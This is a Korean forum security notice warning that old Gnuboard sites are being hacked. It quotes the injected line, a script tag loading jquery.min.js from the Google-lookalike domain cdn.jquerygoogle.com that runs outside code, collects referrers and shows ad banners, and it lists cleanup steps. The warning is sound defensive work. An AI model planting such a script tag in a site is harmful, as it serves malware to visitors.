• 회원가입
  • 로그인
  • 구글아이디로 로그인

[news] 오래된 그누보드에 광고 악성코드 심는 해킹주의

2,692  

오래된 그누보드 해킹주의보

 

그누보드 관리자 페이지 > 환경설정 > 기본환경설정 > 추가 메타태그 부분에 아래와 같은 코드가 심어져 있는지 체크.


<script src=https://cdn.jquerygoogle.com/jquery.min.js></script>

 

위 코드는 구글링크를 가장해 (외부스크립트 실행 /사용자 리퍼러 정보 수집)해 사이트에 광고 배너 띄우는 악성코드이니, 발견 즉시 삭제하고 아래 조치를 시행.

  • 그누보드를 최신버전으로 업그레이드
  • 백신으로 PC 검사
  • 최고관리자 패스워드 변경
  • FTP 및 DB 비밀번호 변경
  • FTP 접속해 파일 내려받아, 여러파일 검색 지원되는 유틸(에디트플러스, VSCODE 등)로 'jquerygoogle' 키워드 검사해 해당 코드를 심는 코드가 파일에 있진 않는지 체크.

  

관련글: (231023) https://sir.kr/cm_free/1670736


분류 제목
life 회원 님, 정말로 이래도 보이스피싱에 안 당할 자신 있으신가요?
talk 대한민국 국민들에게 강력한 경고하는 외국 언론들
ucc 회원 님, 수학 근의공식 아시나요? [유머]
dance 요즘 가장 핫한 엉덩이 흔들기 매니악 비비지 댄스
talk 웨일스랑 뛰는 국대팀 축구 보니까 드는 생각
talk 코로나 걸린 줄 알았는데, 단순 독감이라고 하네요.
dance 치어리더 최홍라 님 불금 댄스
talk 고려거란전쟁 용장 "지채문" 장군 죽는 줄 알고 깜놀 ㅡㅡ;
dance 찐며든사랑 님의 힘숨찐 오랜만이죠? 댄스
dance 토카토카 제로투 댄스
dance 소울 SOUL 리하 하은 님 댄스 - FEARLESS 피어리스 & CAKE 케이크
dance (모모, 쯔위, 지효) Single Ladies 댄스
dance 한글 창제하신 세종대왕 님 감사합니다. 댄스
dance We;Na 위나 연서 님 댄스 - QUEEN
talk 오후에 진눈깨비 온다고 하길래 뭔가 하고 찾아봤더니...
talk 글 작성 완료 후, 확인 누르기 전 꼭 (Ctrl + C) 복사하기
military B-21 레이더(Raider) 스텔스 폭격기로 중국 베이징 타격 (※ B-2 업그레이드 버전)
drama 환혼 복습
sports 여자 배구 파워 서브
dance 레이디비(LADY.B) 시온(SION) 님 - 카라 메들리(Kara Medley) 'Lupin,Pretty …
28/163
목록
찾아주셔서 감사합니다. Since 2012